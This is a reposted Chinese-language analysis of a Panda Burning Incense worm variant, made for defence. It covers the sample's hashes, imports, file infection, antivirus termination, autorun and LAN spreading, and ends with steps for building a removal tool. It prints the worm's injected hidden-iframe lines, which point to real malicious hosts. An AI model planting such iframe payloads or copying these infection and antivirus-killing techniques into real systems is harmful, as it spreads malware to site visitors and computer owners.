熊貓燒香變種病毒分析分析報告

樣本名2_dump_SCY.exe（熊貓燒香）

作者	yusakul
時間	2018-07-13
平臺	Win7-32

1．樣本概況

1.1 樣本信息

病毒名稱2_dump_SCY.exe

所屬家族	熊貓燒香
樣本名稱	0c15096fb3bc30800f7af002c25953162b799391300a62b8507fe8e4f6532768
樣本類型	PE
樣本大小	98816 bytes
MD5值	b8f8e75c9e77743a61bbea9ccbcffd5d
SHA1值	188fc8fc580c0ea4bf8a8900a3d36471823c8923
CRC32	E63D45D3
SHA256	0c15096fb3bc30800f7af002c25953162b799391300a62b8507fe8e4f6532768
SSDeep	3072:apAja0pSLwYqK6hVZ7N4bdq4a53YKCOTpc:a2ja0pShqK65ZOq4QYK1m

1.2 病毒行為

設置注冊表實現自啟動

修改資源管理器（explorer）的文件夾的隱藏屬性

將進程的內存屬性修改為可執行或可寫

想系統服務發送控制碼

刪除服務

對指定運行的進程感興趣

1.2 測試環境及工具

工具備注

VMware? Workstation 14 Pro	分析環境win7_x32
火絨劍	行為監控
IDA pro 7.0	靜態分析
Ollydbg	動態分析

1.3 分析目標

1.3.1 查看PE文件

1. kernel32.dll文件導入函數

可以看出導入的這些函數都是進程、文件相關的API函數。

2. Advapi32.dll

Advapi32.dll是一個高級API應用程序接口。包括了函數與對象的安全性，注冊表的操控以及事件日志相關的API函數。

這些函數主要包括三類：注冊表相關函數，進程權限修改函數，服務相關函數。

3. Mpr.dll

Mpr.dll是windows操作系統網絡通信相關模塊。

Wsock.dll windows socket相關API接口。

WNetAddConnection2A創建一個網絡資源的鏈接。

URLDownloadToFileA從指定的URL讀取內容寫入到文件中。

由上述的導入表分析可知，該病毒程序的主要功能包括：文件讀寫、注冊表修改、進程權限修改，網絡鏈接，URL等。

1.3.2 火絨劍監控 - 文件操作

1. 創建自我備份在根目錄

2. 創建并釋放隱藏文件Desktop_.ini

3. 自我復制

1.3.2火絨劍監控 - 注冊表操作

1. 無效“顯示所有文件和文件夾”功能

2. 刪除殺毒軟件自啟項

3. 修改文件

使用notepad++查看被修改的文件，被新添加了一行：

<iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>

將該網址提交微步在線分析如下

1.3.3 火絨劍監控 - 網絡操作

1. 掃描并嘗試連接局域網腦內139、445端口

因為本次分析是在虛擬機封閉分析，所以沒有連接其他主機，猜測此病毒連接成功后，會向其他主機發送自己，達到傳播目的。

2. 嘗試連接外網IP，并發送數據包

數據內容如下：

1.3.4火絨劍監控 - 進程操作

1. 遍歷系統進程并啟動自釋放文件

2．具體行為分析

2.1 主要行為

2.1.1 惡意程序對用戶造成的危害

1. 替換程序圖標

2. 隱藏文件

3. 有目錄創建Desktop_.ini文件，內容為當前時間（2018-7-11）。

大量用戶軟件被修改，無法正常運行

2.2 惡意代碼分析

2.2.1 惡意代碼樹結構圖

2.2.1 惡意代碼IDA結構圖

兩次對比字符串是否相等，不相等則退出, 驗證完成后有三個主要的惡意行為函數

2.2.2 主要功能函數sub_40819C – 復制

此函數主要功能為自我復制到系統目錄并執行復制體。

1．查找系統目錄下是否存在Desktop.ini文件,有則刪除

2．檢測病毒spc0lsv.exe

病毒會通過檢查文件路徑、病毒感染標志來確定進當前病毒屬于以下三種情況的哪一種情況。

分別進程本身屬于原始病毒文件、被感染的可執行文件、以及偽裝目標進程三種情況。

（1）原始病毒文件

拷貝自身到
~/system32/driver/目錄，重命名為spc0lsv.exe并運行，然后結束當前進程。

（2）當前程序時是被感染的可執行文件

1）在當前目錄釋放被感染的原始文件

2）刪除系統目錄下spo0lav

3）將創建病毒程序拷貝到系統目錄，并執行。

（3）當前運行路徑為系統根目錄，說明當前是在偽裝成系統程序狀態下運行的，沒有敏感操作。

2.2.3 主要功能函數sub_40D18C – 感染

此函數為感染傳播函數。

該函數由3個主要函數，第一個執行感染功能，第二個實現自我復制，第三個局域網傳播自身。

感染文件線程

（1）遍歷文件夾，判斷是否為文件夾，判斷目錄下是否存在Desktop_.ini文件。

判斷是否存在Desktop_.ini

（2）若目錄下存在Desktop_.ini，獲取當前系統時間，對比Desktop_.ini中的時間，是同一天則表示此目錄已被感染，跳過此目錄。

若不同則在此目錄下生成新的Desktop_.ini，寫入本地時間。

（3）刪除GHO備份

（4）感染PE文件 – 感染方式1

將病毒內容直接覆蓋到要感染程序，感染目標文件后綴類型有：EXE、SCR、PIF、COM。

f_HackWay1:

（5）感染PE文件 – 感染方式2

網頁感染：感染目標文件后綴類型有：htm, html, asp, php, jsp, aspx。

主要將字符串（<iframe src=http://www.krvkr.com/worm.htm width=0
height=0></iframe>）添加到文件末尾。

f_HackWays:

2. 自我復制 - 時鐘周期6s

檢索各個磁盤的根目錄是否存在setup.exe和autorun.inf文件，存在則刪除它們。

將自身復制到 盤符:\setup.exe

遍歷磁盤, 創建“盤符:\autorun.inf”文件。

設置setup.exe文件屬性為 <系統,隱藏>

設置autorun.inf文件屬性為 <系統，隱藏>，同時將setup.exe設置為自啟

3. 局域網傳播

2.2.4 主要功能函數sub_40D088 – 其他

此函數主要功能為通過修改注冊表實現自我保護，連接網站實現自我更新等功能。

該函數中設置了6個時鐘周期，定時執行不同的功能。

TimerFunc_1（1s）

（1）提升進程權限

（2）遍歷窗口名, 向指定窗口名發送QUIT消息, 并結束指定進程，大多為殺毒防護軟件。

（3）掃描進程，如果有檢測到以下進程則結束它，下圖為部分截圖：

（4）修改注冊表，設置spo0lsv.exe開機啟動，設置文件（夾）隱藏

TimerFunc_2（1200s）

通過URL地址更新

TimerFunc_3（10s）

（1）通過URL地址更新

（2）刪除網絡共享：net share ipc$ /del 刪除ipc$共享

（3）關閉當前時鐘

4. TimerFunc_4（6s）

將殺毒軟件服務停止，并刪除注冊表啟動項。

TimerFunc_5（10s）

字符串被加密操作過，根據特征猜測可能是網址，似乎是對一些網址做了操作。

TimerFunc_6（180s）

仍然是從某個網址上下載文件，應該不是關鍵操作。

3．解決方案

3.1 病毒行為

病毒行為1：病毒本身創建了名為“spo01sv.exe”的進程，該進程文件的路徑為“C:\WINDOWS\system32\drivers\spo01sv.exe”。

病毒行為2：在注冊表KCU\Software\Microsoft\Windows\CurrentVersio

n\Run”中創建“svcshare”，用于在開機時啟動位于“C:\WINDOWS\system3

2\drivers\spo0lsv.exe”的病毒程序。

病毒行為3：修改注冊表，使得隱藏文件無法通過普通的設置進行顯示，該位置為HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Adva

nced\Folder\Hidden\SHOWALL，病毒將CheckedValue的鍵值設置為了0。

病毒行為4：將自身拷貝到根目錄，并命名為“setup.exe”，同時創建“autorun.inf”用于病毒的啟動，這兩個文件的屬性都是“隱藏”。

病毒行為5：在一些目錄中創建名為“Desktop_.ini”的隱藏文件。

3.2 殺毒工具編寫步驟

3.2.1 終止病毒進程

利用ToolHelpAPI獲得快照句柄,而后再利用Process32First和Process32Next枚舉當前的進程,枚舉的過程當中獲取結構體ProcessEntry32這個結構體里面的相關信息(包括進程名和進程ID);

找到目標進程之后,利用OpenProcess獲取當前的進程句柄,最后再利用TerminateProcess終止病毒進程.

3.2.2. 刪除文件

調用函數Bool DeleteFile (LPCTSTR
lpFilename)，把lpFilename設為要指向刪除的文件的文件名的指針即可,可以包含具體路徑。

3.2.3 修復注冊表，刪除啟動啟動項

RegOpenKeyEx()打開目標主鍵,并返回句柄,然后利用RegSetValueEx進行修改鍵值,最后可以利用RegSetValueEx來刪除鍵值,最后利用RegCloseKey來進行關閉。

3.2.3 查殺工具鏈接

我的GitHub·https://github.com/yusakul/PandaKiller

3.2.4 工具截圖

總結

以上是生活随笔為你收集整理的熊猫烧香变种病毒分析的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。